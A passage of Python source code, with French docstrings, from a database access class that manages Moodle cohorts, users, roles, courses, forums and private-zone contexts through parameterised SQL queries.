.format(entete=self.entete)
self.mark.execute(s, params={'id_context': id_context, 'name': name, 'id_number': id_number,
'description': description, 'time_created': time_created})
def disenroll_user_from_username_and_cohortname(self, username, cohortname):
"""
Désenrole un utilisateur d'une cohorte.
:param username:
:param cohortname:
:return:
"""
self.mark.execute("DELETE {entete}cohort_members FROM {entete}cohort_members"
" INNER JOIN {entete}cohort"
" ON {entete}cohort_members.cohortid = {entete}cohort.id"
" INNER JOIN {entete}user"
" ON {entete}cohort_members.userid = {entete}user.id"
" WHERE {entete}user.username = %(username)s"
" AND {entete}cohort.name = %(cohortname)s".format(entete=self.entete),
params={
'username': username,
'cohortname': cohortname
})
def delete_empty_cohorts(self):
"""
Supprime les cohortes de la liste qui n'ont aucun membre
:return:
"""
s = "DELETE FROM {entete}cohort WHERE id NOT IN (SELECT cohortid FROM {entete}cohort_members)" \
.format(entete=self.entete)
self.mark.execute(s)
def get_id_cohort(self, id_context, cohort_name):
"""
Fonction permettant de recuperer l'id d'une cohorte
par son nom et son contexte de rattachement.
:param id_context:
:param cohort_name:
:return:
"""
s = "SELECT id" \
" FROM {entete}cohort" \
" WHERE contextid = %(id_context)s" \
" AND name = %(cohort_name)s" \
.format(entete=self.entete)
self.mark.execute(s, params={'id_context': id_context, 'cohort_name': cohort_name})
ligne = self.safe_fetchone()
if ligne is None:
return None
return ligne[0]
def get_user_id(self, username):
"""
Fonction permettant de recuperer l'id d'un
utilisateur moodle via son username.
:param username: str
:return:
"""
s = "SELECT id FROM {entete}user " \
"WHERE username = %(username)s" \
.format(entete=self.entete)
self.mark.execute(s, params={'username': username.lower()})
ligne = self.safe_fetchone()
if ligne is None:
return None
return ligne[0]
def enroll_user_in_cohort(self, id_cohort, id_user, time_added):
"""
Fonction permettant d'ajouter un utilisateur a une
cohorte.
:param id_cohort:
:param id_user:
:param time_added:
:return:
"""
s = "INSERT IGNORE" \
" INTO {entete}cohort_members(cohortid, userid, timeadded)" \
" VALUES (%(id_cohort)s, %(id_user)s, %(time_added)s)" \
.format(entete=self.entete)
self.mark.execute(s, params={'id_cohort': id_cohort, 'id_user': id_user, 'time_added': time_added})
def purge_cohort_profs(self, id_cohort, list_profs):
"""
fonction permettant la purge d'une cohort de profs
:param id_cohort:
:param list_profs:
:return:
"""
ids_list, ids_list_params = array_to_safe_sql_list(list_profs, 'ids_list')
s = "DELETE FROM {entete}cohort_members" \
" WHERE cohortid = %(id_cohort)s" \
" AND userid NOT IN ({ids_list})" \
.format(entete=self.entete, ids_list=ids_list)
self.mark.execute(s, params={'id_cohort': id_cohort, **ids_list_params})
def delete_moodle_local_admins(self, id_context_categorie, ids_not_admin):
"""
Fonction permettant de supprimer les admins locaux
d'un contexte en gardant uniquement les admins specifies.
:param id_context_categorie:
:param ids_not_admin:
:return:
"""
if not ids_not_admin:
return
# Construction de la liste des ids admins a conserver
ids_list, ids_list_params = array_to_safe_sql_list(ids_not_admin, 'ids_list')
# Recuperation de l'id pour le role d'admin local
id_role_admin_local = self.get_id_role_admin_local()
# Suppression des admins non presents dans la liste
s = "DELETE FROM {entete}role_assignments" \
" WHERE roleid = %(id_role_admin_local)s" \
" AND contextid = %(id_context_categorie)s" \
" AND userid IN ({ids_list})" \
.format(entete=self.entete, ids_list=ids_list)
self.mark.execute(s, params={'id_role_admin_local': id_role_admin_local,
'id_context_categorie': id_context_categorie, **ids_list_params})
def get_id_role_admin_local(self):
"""
Fonction permettant de recuperer l'id du role admin local
au sein de la BD moodle.
:return:
"""
return self.get_id_role_by_shortname(SHORTNAME_ADMIN_LOCAL)
def get_id_role_by_shortname(self, short_name):
"""
Fonction permettant de recuperer l'id d'un role via son shortname
:param short_name:
:return:
"""
s = "SELECT id FROM {entete}role" \
" WHERE shortname = %(short_name)s" \
.format(entete=self.entete)
self.mark.execute(s, params={'short_name': short_name})
ligne = self.safe_fetchone()
if ligne is None:
raise ValueError("Le rôle %s n'existe pas." % short_name)
return ligne[0]
def delete_moodle_local_admin(self, id_context_categorie, userid):
"""
Fonction permettant de supprimer les admins locaux
d'un contexte en gardant uniquement les admins specifies.
:param id_context_categorie:
:param userid:
:return:
"""
id_role_admin_local = self.get_id_role_admin_local()
self.delete_moodle_assignment(id_context_categorie, userid, id_role_admin_local)
def delete_moodle_assignment(self, id_context_category, userid, roleid):
"""
Fonction permettant de supprimer un role à un utilisateur
dans un contexte
:param id_context_category:
:param userid:
:param roleid:
:return:
"""
s = "DELETE FROM {entete}role_assignments" \
" WHERE contextid = %(id_context_category)s" \
" AND roleid = %(roleid)s" \
" AND userid = %(userid)s" \
.format(entete=self.entete)
self.mark.execute(s, params={'id_context_category': id_context_category, 'roleid': roleid, 'userid': userid})
def delete_role_for_contexts(self, role_id, ids_contexts_by_courses, id_user):
"""
Fonction permettant de supprimer un role sur differents
contextes pour l'utilisateur specifie.
:param role_id:
:param ids_contexts_by_courses:
:param id_user:
:return:
"""
# Suppression des enrolments dans les cours
for id_course in ids_contexts_by_courses:
# Recuperation de la methode d'enrolment
id_enrol = self.get_id_enrol(ENROL_METHOD_MANUAL, role_id, id_course)
if not id_enrol:
continue
# Suppression de l'enrolment associe
id_user_enrolment = self.get_id_user_enrolment(id_enrol, id_user)
if id_user_enrolment:
s = "DELETE FROM {entete}user_enrolments " \
"WHERE id = %(id_user_enrolment)s" \
.format(entete=self.entete)
self.mark.execute(s, params={'id_user_enrolment': id_user_enrolment})
# Suppression des roles dans les contextes
ids_list, ids_list_params = array_to_safe_sql_list(ids_contexts_by_courses.values(), 'ids_list')
s = "DELETE FROM {entete}role_assignments" \
" WHERE roleid = %(role_id)s" \
" AND contextid IN ({ids_list})" \
" AND userid = %(id_user)s" \
.format(entete=self.entete, ids_list=ids_list)
self.mark.execute(s, params={'role_id': role_id, 'id_user': id_user, **ids_list_params})
def get_id_enrol(self, enrol_method, role_id, id_course):
"""
Fonction permettant de recuperer un id
dans la table permettant les enrolments
:param enrol_method:
:param role_id:
:param id_course:
:return:
"""
s = "SELECT e.id FROM {entete}enrol AS e" \
" WHERE e.enrol = %(enrol_method)s" \
" AND e.courseid = %(id_course)s" \
" AND e.roleid = %(role_id)s" \
.format(entete=self.entete)
self.mark.execute(s, params={'enrol_method': enrol_method, 'id_course': id_course, 'role_id': role_id})
ligne = self.safe_fetchone()
if ligne is None:
return None
return ligne[0]
def get_id_user_enrolment(self, id_enrol, id_user):
"""
Fonction permettant de recuperer l'id d'un user enrolment
:param id_enrol:
:param id_user:
:return:
"""
s = "SELECT id" \
" FROM {entete}user_enrolments " \
" WHERE userid = %(id_user)s" \
" AND enrolid = %(id_enrol)s" \
.format(entete=self.entete)
self.mark.execute(s, params={'id_user': id_user, 'id_enrol': id_enrol})
ligne = self.safe_fetchone()
if ligne is None:
return None
return ligne[0]
def delete_roles(self, ids_roles):
"""
Fonction permettant de supprimer des roles.
:param ids_roles:
:return:
"""
# Construction de la liste des ids des roles concernes
ids_list, ids_list_params = array_to_safe_sql_list(ids_roles, 'ids_list')
s = "DELETE FROM {entete}role_assignments" \
" WHERE id IN ({ids_list})" \
.format(entete=self.entete, ids_list=ids_list)
self.mark.execute(s, params={**ids_list_params})
def disenroll_user_from_cohorts(self, ids_cohorts_to_keep, id_user):
"""
Fonction permettant d'enlever un utilisateur d'une
ou plusieurs cohortes.
Seules les inscriptions dans les cohortes passees en
parametres sont conservees.
:param ids_cohorts_to_keep:
:param id_user:
:return:
"""
# Construction de la liste des ids des cohortes concernes
ids_list, ids_list_params = array_to_safe_sql_list(ids_cohorts_to_keep, 'ids_list')
s = "DELETE FROM {entete}cohort_members" \
" WHERE userid = %(id_user)s" \
" AND cohortid NOT IN ({ids_list})" \
.format(entete=self.entete, ids_list=ids_list)
self.mark.execute(s, params={'id_user': id_user, **ids_list_params})
def disenroll_user_from_cohort(self, id_cohort, id_user):
"""
Fonction permettant d'enlever un utilisateur d'une
cohorte.
:param id_cohort:
:param id_user:
:return:
"""
s = "DELETE FROM {entete}cohort_members" \
" WHERE cohortid = %(id_cohort)s" \
" AND userid = %(id_user)s" \
.format(entete=self.entete)
self.mark.execute(s, params={'id_cohort': id_cohort, 'id_user': id_user})
def get_cohort_name(self, id_cohort):
"""
Fonction permettant de recuperer le nom d'une cohorte.
:param id_cohort:
:return:
"""
s = "SELECT name FROM {entete}cohort" \
" WHERE id = %(id_cohort)s" \
.format(entete=self.entete)
self.mark.execute(s, params={'id_cohort': id_cohort})
ligne = self.safe_fetchone()
if ligne is None:
return None
return ligne[0]
def get_description_course_category(self, id_category):
"""
Fonction permettant de recuperer la description d'une
categorie.
:param id_category:
:return:
"""
s = "SELECT description" \
" FROM {entete}course_categories" \
" WHERE id = %(id_category)s" \
.format(entete=self.entete)
self.mark.execute(s, params={'id_category': id_category})
ligne = self.safe_fetchone()
if ligne is None:
return None
return ligne[0]
def get_descriptions_course_categories_by_themes(self, themes):
"""
Fonction permettant de recuperer les descriptions de categories.
:param themes:
:return:
"""
ids_list, ids_list_params = array_to_safe_sql_list(themes, 'ids_list')
s = "SELECT description" \
" FROM {entete}course_categories" \
" WHERE theme IN ({ids_list})" \
.format(entete=self.entete, ids_list=ids_list)
self.mark.execute(s, params={**ids_list_params})
result_set = self.mark.fetchall()
if not result_set:
return []
descriptions = [result[0] for result in result_set]
return descriptions
def get_id_block(self, parent_context_id):
"""
Fonction permettant de recuperer l'id d'un bloc.
:param parent_context_id:
:return:
"""
s = "SELECT id" \
" FROM {entete}block_instances" \
" WHERE parentcontextid = %(parent_context_id)s" \
.format(entete=self.entete)
self.mark.execute(s, params={'parent_context_id': parent_context_id})
ligne = self.safe_fetchone()
if ligne is None:
return None
return ligne[0]
def get_course_timemodified(self, course_id: int):
s = "SELECT timemodified FROM {entete}course" \
" WHERE id = %(course_id)s" \
.format(entete=self.entete)
self.mark.execute(s, params={'course_id': course_id})
ligne = self.safe_fetchone()
if ligne is None:
return None
return ligne[0]
def delete_course(self, course_id: int):
s = "DELETE FROM {entete}course WHERE id = %(course_id)s" \
.format(entete=self.entete)
self.mark.execute(s, params={
'course_id': course_id
})
def get_courses_ids_owned_by(self, user_id: int):
s = "SELECT instanceid FROM {entete}context AS context" \
" INNER JOIN {entete}role_assignments AS role_assignments" \
" ON context.id = role_assignments.contextid" \
" WHERE role_assignments.userid = %(userid)s AND role_assignments.roleid = %(roleid)s" \
.format(entete=self.entete)
self.mark.execute(s, params={'userid': user_id, 'roleid': self.constantes.id_role_proprietaire_cours})
return self.mark.fetchall()
def get_userids_owner_of_course(self, course_id: int):
s = "SELECT userid FROM {entete}role_assignments AS role_assignments" \
" INNER JOIN {entete}context AS context" \
" ON role_assignments.contextid = context.id" \
" WHERE context.instanceid = %(courseid)s AND role_assignments.roleid = %(roleid)s" \
.format(entete=self.entete)
self.mark.execute(s, params={'courseid': course_id, 'roleid': self.constantes.id_role_proprietaire_cours})
return self.mark.fetchall()
def get_id_categorie(self, categorie_name):
"""
Fonction permettant de recuperer l'id correspondant a la
categorie inter-etablissements.
:param categorie_name:
:return:
"""
s = "SELECT id" \
" FROM {entete}course_categories" \
" WHERE name = %(categorie_name)s" \
.format(entete=self.entete)
self.mark.execute(s, params={'categorie_name': categorie_name})
ligne = self.safe_fetchone()
return ligne[0] if ligne else None
def get_id_context_no_depth(self, context_level, instance_id):
"""
Fonction permettant de recuperer l'id d'un contexte via
le niveau et l'id de l'instance associee.
:param context_level:
:param instance_id:
:return:
"""
s = "SELECT id" \
" FROM {entete}context" \
" WHERE contextlevel = %(context_level)s" \
" AND instanceid = %(instance_id)s" \
.format(entete=self.entete)
self.mark.execute(s, params={'context_level': context_level, 'instance_id': instance_id})
ligne = self.safe_fetchone()
if ligne is None:
return None
return ligne[0]
def get_id_context(self, context_level, depth, instance_id):
"""
Fonction permettant de recuperer l'id d'un contexte via
le niveau, la profondeur et l'id de l'instance associee.
:param context_level:
:param depth:
:param instance_id:
:return:
"""
s = "SELECT id" \
" FROM {entete}context" \
" WHERE contextlevel = %(context_level)s" \
" AND depth = %(depth)s" \
" AND instanceid = %(instance_id)s" \
.format(entete=self.entete)
self.mark.execute(s, params={'context_level': context_level, 'depth': depth, 'instance_id': instance_id})
ligne = self.safe_fetchone()
if ligne is None:
return None
return ligne[0]
def get_id_context_categorie(self, id_etab_categorie):
"""
Fonction permettant de recuperer l'id d'une contexte via
l'id d'un etablissement.
:param id_etab_categorie:
:return:
"""
return self.get_id_context(self.constantes.niveau_ctx_categorie, 2, id_etab_categorie)
def get_id_context_inter_etabs(self):
"""
Fonction permettant de recuperer l'id du contexte de la categorie inter-etablissements
:return:
"""
s = "SELECT id" \
" FROM {entete}context" \
" WHERE contextlevel = %(context_level)s" \
" AND instanceid = %(instanceid)s" \
.format(entete=self.entete)
self.mark.execute(s, params={'context_level': self.constantes.niveau_ctx_categorie,
'instanceid': self.constantes.id_instance_moodle})
ligne = self.safe_fetchone()
if ligne is None:
return None
return ligne[0]
def get_id_course_by_id_number(self, id_number):
"""
Fonction permettant de recuperer l'id d'un cours a partir de son idnumber.
:param id_number:
:return:
"""
s = "SELECT id" \
" FROM {entete}course" \
" WHERE idnumber = %(id)s" \
.format(entete=self.entete)
self.mark.execute(s, params={'id': id_number})
ligne = self.safe_fetchone()
if ligne is None:
return None
return ligne[0]
def get_id_course_category_by_id_number(self, id_number):
"""
Récupère l'id d'une categorie à partir de son idnumber.
:param id_number:
:return:
"""
s = "SELECT id" \
" FROM {entete}course_categories" \
" WHERE idnumber" \
" LIKE %(id)s" \
.format(entete=self.entete)
self.mark.execute(s, params={'id': '%' + str(id_number) + '%'})
ligne = self.safe_fetchone()
if ligne is None:
return None
return ligne[0]
def get_id_course_category_by_theme(self, theme):
"""
Récupère l'id d'une categorie à partir de son theme.
:param theme:
:return:
"""
s = "SELECT id" \
" FROM {entete}course_categories" \
" WHERE theme = %(theme)s" \
.format(entete=self.entete)
self.mark.execute(s, params={'theme': theme})
ligne = self.safe_fetchone()
if ligne is None:
return None
return ligne[0]
def get_id_course_module(self, course):
"""
Récupère l'id d'un module de cours.
:param course:
:return:
"""
s = "SELECT id" \
" FROM {entete}course_modules" \
" WHERE course = %(course)s" \
.format(entete=self.entete)
self.mark.execute(s, params={'course': course})
ligne = self.safe_fetchone()
if ligne is None:
return None
return ligne[0]
def get_id_forum(self, course):
"""
Fonction permettant de recuperer l'id du contexte propre
a moodle.
:param course:
:return:
"""
s = "SELECT id" \
" FROM {entete}forum" \
" WHERE course = %(course)s" \
.format(entete=self.entete)
self.mark.execute(s, params={'course': course})
ligne = self.safe_fetchone()
if ligne is None:
return None
return ligne[0]
def get_id_user_info_data(self, id_user, id_field):
"""
Fonction permettant de recuperer l'id d'un info data via
l'id-user et l'id_field
:param id_user:
:param id_field:
:return:
"""
s = "SELECT id" \
" FROM {entete}user_info_data " \
" WHERE userid = %(id_user)s" \
" AND fieldid = %(id_field)s" \
.format(entete=self.entete)
self.mark.execute(s, params={'id_user': id_user, 'id_field': id_field})
ligne = self.safe_fetchone()
if ligne is None:
return None
return ligne[0]
def get_id_user_info_field_by_shortname(self, short_name):
"""
Fonction permettant de recuperer l'id d'un info field via
son shortname.
:param short_name:
:return:
"""
s = "SELECT id" \
" FROM {entete}user_info_field" \
" WHERE shortname = %(short_name)s" \
.format(entete=self.entete)
self.mark.execute(s, params={'short_name': short_name})
ligne = self.safe_fetchone()
if ligne is None:
return None
return ligne[0]
def get_ids_and_summaries_not_allowed_roles(self, id_user, allowed_forums_shortnames):
"""
Fonction permettant de recuperer les ids des roles non
autorises sur les forums, ainsi que les non des forums
sur lesquels portent ces roles.
:param id_user:
:param allowed_forums_shortnames:
:return:
"""
# Construction de la liste des shortnames
ids_list, ids_list_params = array_to_safe_sql_list(allowed_forums_shortnames, 'ids_list')
s = "SELECT mra.id, mco.summary" \
" FROM {entete}course mco, {entete}role_assignments mra, {entete}context mc" \
" WHERE mco.shortname LIKE 'ZONE-PRIVEE-%%'" \
" AND mco.shortname NOT IN ({ids_list})" \
" AND mco.id = mc.instanceid" \
" AND mc.contextlevel = 50" \
" AND mc.id = mra.contextid" \
" AND mra.userid = %(id_user)s" \
.format(entete=self.entete, ids_list=ids_list)
self.mark.execute(s, params={'id_user': id_user, **ids_list_params})
result_set = self.mark.fetchall()
if not result_set:
return [], []
# Recuperation des ids et themes non autorises
ids = [result[0] for result in result_set]
summaries = [result[1] for result in result_set]
return ids, summaries
def get_ids_and_themes_not_allowed_roles(self, id_user, allowed_themes):
"""
Fonction permettant de recuperer les ids des roles qui ne sont pas autorises pour l'utilisateur.
:param id_user:
:param allowed_themes:
:return:
"""
# Construction de la liste des themes
ids_list, ids_list_params = array_to_safe_sql_list(allowed_themes, 'ids_list')
# Recuperation des roles sur les etablissements qui ne devraient plus exister
# (quand le prof n'est plus rattache aux etablissements)
s = "SELECT mra.id, mcc.theme" \
" FROM {entete}course_categories mcc, {entete}context mc, {entete}role_assignments mra" \
" WHERE mcc.theme NOT IN ({ids_list})" \
" AND mcc.theme IS NOT NULL" \
" AND mcc.id = mc.instanceid " \
" AND mc.contextlevel = %(NIVEAU_CTX_CATEGORIE)s AND mc.depth = %(PROFONDEUR_CTX_ETAB)s" \
" AND mc.id = mra.contextid" \
" AND mra.userid = %(id_user)s" \
.format(entete=self.entete, ids_list=ids_list)
self.mark.execute(s, params={**ids_list_params, 'NIVEAU_CTX_CATEGORIE': self.constantes.niveau_ctx_categorie,
'PROFONDEUR_CTX_ETAB': PROFONDEUR_CTX_ETAB, 'id_user': id_user})
result_set = self.mark.fetchall()
if not result_set:
return [], []
# Recuperation des ids et themes non autorises
ids = [result[0] for result in result_set]
themes = [result[1] for result in result_set]
return ids, themes
def get_timestamp_now(self):
"""
Fonction permettant de recuperer le timestamp actuel.
:return:
"""
s = "SELECT UNIX_TIMESTAMP( now( ) ) - 3600*2"
self.mark.execute(s)
now = self.mark.fetchone()[0]
return now
def get_users_ids(self, usernames):
"""
Fonction permettant de recuperer les ids des
utilisateurs moodle via leurs usernames.
:param usernames:
:return:
"""
users_ids = []
for username in usernames:
user_id = self.get_user_id(username)
users_ids.append(user_id)
return users_ids
def user_has_role(self, userid, roles_list):
"""
Vérifie si un utilisateur a au moins un role parmis une liste
:param userid:
:param roles_list:
:return:
"""
ids_list, ids_list_params = array_to_safe_sql_list(roles_list, 'ids_list')
self.mark.execute("SELECT COUNT(role.id)"
" FROM {entete}role AS role"
" INNER JOIN {entete}role_assignments AS role_assignments"
" ON role.id = role_assignments.roleid"
" WHERE role_assignments.userid = %(userid)s"
" AND role.id IN ({ids_list})".format(entete=self.entete, ids_list=ids_list),
params={
'userid': userid,
**ids_list_params
})
count = self.mark.fetchone()[0]
return count > 0
def get_all_valid_users(self):
"""
Retourne tous les utilisateurs de la base de données qui ne sont pas marqués comme "supprimés"
:return:
"""
self.mark.execute("SELECT"
" id AS id,"
" username AS username,"
" lastlogin AS lastlogin"
" FROM {entete}user WHERE deleted = 0".format(entete=self.entete))
return self.mark.fetchall()
def delete_users(self, user_ids, safe_mode=False):
"""
Supprime des utilisateurs de la BDD
:param user_ids:
:param safe_mode:
:return:
"""
ids_list, ids_list_params = array_to_safe_sql_list(user_ids, 'ids_list')
s = "DELETE FROM {entete}user WHERE id IN ({ids_list})".format(entete=self.entete, ids_list=ids_list)
if safe_mode:
s += " AND deleted = 1"
self.mark.execute(s, params={
**ids_list_params
})
def delete_useless_users(self):
"""
Supprime les utilisateurs de la BDD avec le champ "deleted = 1"
:return:
"""
self.mark.execute("DELETE FROM {entete}user WHERE deleted = 1".format(entete=self.entete))
def anonymize_users(self, user_ids):
"""
Anonymise des utilisateurs de la BDD
:param user_ids:
:return:
"""
ids_list, ids_list_params = array_to_safe_sql_list(user_ids, 'ids_list')
self.mark.execute("UPDATE {entete}user"
" SET firstname = %(anonymous_name)s,"
" lastname = %(anonymous_name)s,"
" firstnamephonetic = %(anonymous_name)s,"
" lastnamephonetic = %(anonymous_name)s,"
" middlename = %(anonymous_name)s,"
" alternatename = %(anonymous_name)s,"
" city = %(anonymous_name)s,"
" address = %(anonymous_name)s,"
" department = %(anonymous_name)s,"
" phone1 = %(anonymous_phone)s,"
" phone2 = %(anonymous_phone)s,"
" skype = %(anonymous_name)s,"
" yahoo = %(anonymous_name)s,"
" aim = %(anonymous_name)s,"
" msn = %(anonymous_name)s,"
" email = %(anonymous_mail)s,"
" description = NULL"
" WHERE id IN ({ids_list})"
.format(entete=self.entete, ids_list=ids_list),
params={
'anonymous_name': self.constantes.anonymous_name,
'anonymous_mail': self.constantes.anonymous_mail,
'anonymous_phone': self.constantes.anonymous_phone,
**ids_list_params
})
def insert_moodle_block(self, block_name, parent_context_id, show_in_subcontexts, page_type_pattern,
sub_page_pattern, default_region, default_weight):
"""
Insère un bloc.
:param block_name:
:param parent_context_id:
:param show_in_subcontexts:
:param page_type_pattern:
:param sub_page_pattern:
:param default_region:
:param default_weight:
:return:
"""
s = "INSERT INTO {entete}block_instances " \
"( blockname, parentcontextid, showinsubcontexts, pagetypepattern, subpagepattern, defaultregion, " \
"defaultweight, timecreated, timemodified ) " \
" VALUES ( %(block_name)s, %(parent_context_id)s, %(show_in_subcontexts)s, %(page_type_pattern)s, " \
"%(sub_page_pattern)s, %(default_region)s, %(default_weight)s, UNIX_TIMESTAMP( now( ) ) - 3600*2," \
"UNIX_TIMESTAMP( now( ) ) - 3600*2 )" \
.format(entete=self.entete)
self.mark.execute(s, params={'block_name': block_name,
'parent_context_id': parent_context_id,
'show_in_subcontexts': show_in_subcontexts,
'page_type_pattern': page_type_pattern,
'sub_page_pattern': sub_page_pattern,
'default_region': default_region,
'default_weight': default_weight})
def insert_moodle_context(self, context_level, depth, instance_id):
"""
Insère un contexte.
:param context_level:
:param depth:
:param instance_id:
:return:
"""
s = "INSERT INTO {entete}context (contextlevel, instanceid, depth)" \
" VALUES (%(context_level)s, %(instance_id)s, %(depth)s)" \
.format(entete=self.entete)
self.mark.execute(s, params={'context_level': context_level, 'instance_id': instance_id, 'depth': depth})
def insert_moodle_course(self, id_category, full_name, id_number, short_name, summary, format_, visible,
start_date, time_created, time_modified):
"""
Fonction permettant d'inserer un cours.
:param id_category:
:param full_name:
:param id_number:
:param short_name:
:param summary:
:param format_:
:param visible:
:param start_date:
:param time_created:
:param time_modified:
:return:
"""
s = "INSERT INTO {entete}course " \
"(category, fullname, idnumber, shortname, summary, " \
"format, visible, startdate, timecreated, timemodified) " \
" VALUES (%(id_category)s, %(full_name)s, %(id_number)s, %(short_name)s, %(summary)s, " \
"%(format)s, %(visible)s, %(start_date)s, %(time_created)s, %(time_modified)s)" \
.format(entete=self.entete)
self.mark.execute(s, params={'id_category': id_category,
'full_name': full_name,
'id_number': id_number,
'short_name': short_name,
'summary': summary,
'format': format_,
'visible': visible,
'start_date': start_date,
'time_created': time_created,
'time_modified': time_modified})
def insert_moodle_course_category(self, name, id_number, description, theme):
"""
Fonction permettant d'inserer une categorie.
:param name:
:param id_number:
:param description:
:param theme:
:return:
"""
s = "INSERT INTO {entete}course_categories" \
" (name, idnumber, description, parent, sortorder, coursecount, visible, depth,theme)" \
" VALUES(%(name)s, %(id_number)s, %(description)s, 0, 999,0, 1, 1, %(theme)s)" \
.format(entete=self.entete)
self.mark.execute(s, params={'name': name, 'id_number': id_number, 'description': description, 'theme': theme})
def insert_moodle_course_module(self, course, module, instance, added):
"""
Fonction permettant d'inserer un module de cours.
:param course:
:param module:
:param instance:
:param added:
:return:
"""
s = "INSERT INTO {entete}course_modules (course, module, instance, added)" \
" VALUES (%(course)s , %(module)s, %(instance)s , %(added)s)" \
.format(entete=self.entete)
self.mark.execute(s, params={'course': course, 'module': module, 'instance': instance, 'added': added})
def insert_moodle_enrol_capability(self, enrol, status, course_id, role_id):
"""
Fonction permettant d'inserer une methode d'inscription
a un cours.
:param enrol:
:param status:
:param course_id:
:param role_id:
:return:
"""
s = "INSERT INTO {entete}enrol(enrol, status, courseid, roleid)" \
" VALUES(%(enrol)s, %(status)s, %(course_id)s, %(role_id)s)" \
.format(entete=self.entete)
self.mark.execute(s, params={'enrol': enrol, 'status': status, 'course_id': course_id, 'role_id': role_id})
def insert_moodle_forum(self, course, name, intro, intro_format, max_bytes, max_attachements, time_modified):
"""
Fonction permettant d'inserer un forum.
:param course:
:param name:
:param intro:
:param intro_format:
:param max_bytes:
:param max_attachements:
:param time_modified:
:return:
"""
s = "INSERT INTO {entete}forum (course, name, intro, introformat, maxbytes, maxattachments, timemodified) " \
"VALUES (%(course)s, %(name)s, %(intro)s, %(intro_format)s, %(max_bytes)s, %(max_attachements)s, " \
"%(time_modified)s)" \
.format(entete=self.entete)
self.mark.execute(s, params={'course': course,
'name': name,
'intro': intro,
'intro_format': intro_format,
'max_bytes': max_bytes,
'max_attachements': max_attachements,
'time_modified': time_modified})
def is_moodle_local_admin(self, id_context_categorie, id_user):
"""
Fonction permettant de vérifier si un utilisateur est
admin local pour un contexte donne.
:param id_context_categorie:
:param id_user:
:return:
"""
id_role_admin_local = self.get_id_role_admin_local()
sql = "SELECT COUNT(id) FROM {entete}role_assignments" \
" WHERE roleid = %(id_role_admin_local)s" \
" AND contextid = %(id_context_categorie)s" \
" AND userid = %(id_user)s" \
.format(entete=self.entete)
params = {'id_role_admin_local': id_role_admin_local, 'id_context_categorie': id_context_categorie,
'id_user': id_user}
self.mark.execute(sql, params=params)
result = self.safe_fetchone()
is_local_admin = result[0] > 0
return is_local_admin
def insert_moodle_local_admin(self, id_context_categorie, id_user):
"""
Fonction permettant d'inserer un admin local pour un
contexte donne.
Retour True si insertion réalisée, False le cas échéant
:param id_context_categorie:
:param id_user:
:return:
"""
if self.is_moodle_local_admin(id_context_categorie, id_user):
return False
id_role_admin_local = self.get_id_role_admin_local()
s = "INSERT ignore INTO {entete}role_assignments(roleid, contextid, userid)" \
" VALUES (%(id_role_admin_local)s, %(id_context_categorie)s, %(id_user)s)" \
.format(entete=self.entete)
params = {'id_role_admin_local': id_role_admin_local, 'id_context_categorie': id_context_categorie,
'id_user': id_user}
self.mark.execute(s, params=params)
return True
def insert_moodle_user(self, username, first_name, last_name, email, mail_display, theme):
"""
Fonction permettant d'inserer un utilisateur dans Moodle.
:param username:
:param first_name:
:param last_name:
:param email:
:param mail_display:
:param theme:
:return:
"""
user_id = self.get_user_id(username)
username = username.lower()
if user_id is None:
s = "INSERT INTO {entete}user" \
" (auth, confirmed, username, firstname, lastname, email, maildisplay, city, country, lang," \
" mnethostid, theme )" \
" VALUES (%(auth)s, %(confirmed)s, %(username)s, %(firstname)s, %(lastname)s, %(email)s," \
" %(maildisplay)s, %(city)s, %(country)s, %(lang)s, %(mnethostid)s, %(theme)s)" \
.format(entete=self.entete)
self.mark.execute(s, params={'auth': USER_AUTH,
'confirmed': 1,
'username': username,
'firstname': first_name,
'lastname': last_name,
'email': email,
'maildisplay': mail_display,
'city': USER_CITY,
'country': USER_COUNTRY,
'lang': USER_LANG,
'mnethostid': USER_MNET_HOST_ID,
'theme': theme})
def insert_moodle_user_info_data(self, id_user, id_field, data):
"""
Fonction permettant d'inserer un user info data.
:param id_user:
:param id_field:
:param data:
:return:
"""
s = "INSERT INTO {entete}user_info_data (userid, fieldid, data)" \
" VALUES (%(id_user)s, %(id_field)s, %(data)s)" \
.format(entete=self.entete)
self.mark.execute(s, params={'id_user': id_user, 'id_field': id_field, 'data': data})
def insert_moodle_user_info_field(self, short_name, name, data_type, id_category, param1, param2, locked, visible):
"""
Fonction permettant d'inserer un user info field.
:param short_name:
:param name:
:param data_type:
:param id_category:
:param param1:
:param param2:
:param locked:
:param visible:
:return:
"""
s = "INSERT INTO {entete}user_info_field" \
" (shortname, name, datatype, categoryid, param1, param2, locked, visible)" \
" VALUES (%(short_name)s, %(name)s, %(data_type)s, %(id_category)s, %(param1)s, %(param2)s, %(locked)s," \
" %(visible)s)" \
.format(entete=self.entete)
self.mark.execute(s, params={'short_name': short_name,
'name': name,
'data_type': data_type,
'id_category': id_category,
'param1': param1,
'param2': param2,
'locked': locked,
'visible': visible})
def insert_zone_privee(self, id_categorie_etablissement, siren, ou, time):
"""
Fonction permettant d'inserer le cours correspondant
a la zone privee.
:param id_categorie_etablissement:
:param siren:
:param ou:
:param time:
:return:
"""
full_name = COURSE_FULLNAME_ZONE_PRIVEE
id_number = short_name = COURSE_SHORTNAME_ZONE_PRIVEE % siren
summary = COURSE_SUMMARY_ZONE_PRIVEE % ou.encode("utf-8")
format_ = COURSE_FORMAT_ZONE_PRIVEE
visible = COURSE_VISIBLE_ZONE_PRIVEE
start_date = time_created = time_modified = time
id_zone_privee = self.get_id_course_by_id_number(id_number)
if id_zone_privee is not None:
return id_zone_privee
self.insert_moodle_course(id_categorie_etablissement, full_name, id_number, short_name, summary, format_,
visible, start_date, time_created, time_modified)
id_zone_privee = self.get_id_course_by_id_number(id_number)
return id_zone_privee
def insert_zone_privee_context(self, id_zone_privee):
"""
Fonction permettant d'inserer le contexte correspondant
a la zone privee.
:param id_zone_privee:
:return:
"""
id_contexte_zone_privee = self.get_id_context(self.constantes.niveau_ctx_cours, PROFONDEUR_CTX_ZONE_PRIVEE,
id_zone_privee)
if id_contexte_zone_privee:
return id_contexte_zone_privee
id_contexte_zone_privee = self.get_id_context_no_depth(self.constantes.niveau_ctx_cours, id_zone_privee)
if id_contexte_zone_privee:
return id_contexte_zone_privee
self.insert_moodle_context(self.constantes.niveau_ctx_cours, PROFONDEUR_CTX_ZONE_PRIVEE, id_zone_privee)
id_contexte_zone_privee = self.get_id_context(self.constantes.niveau_ctx_cours, PROFONDEUR_CTX_ZONE_PRIVEE,
id_zone_privee)
return id_contexte_zone_privee
def purge_cohorts(self, users_ids_by_cohorts_ids):
"""
Fonction permettant de purger des cohortes.
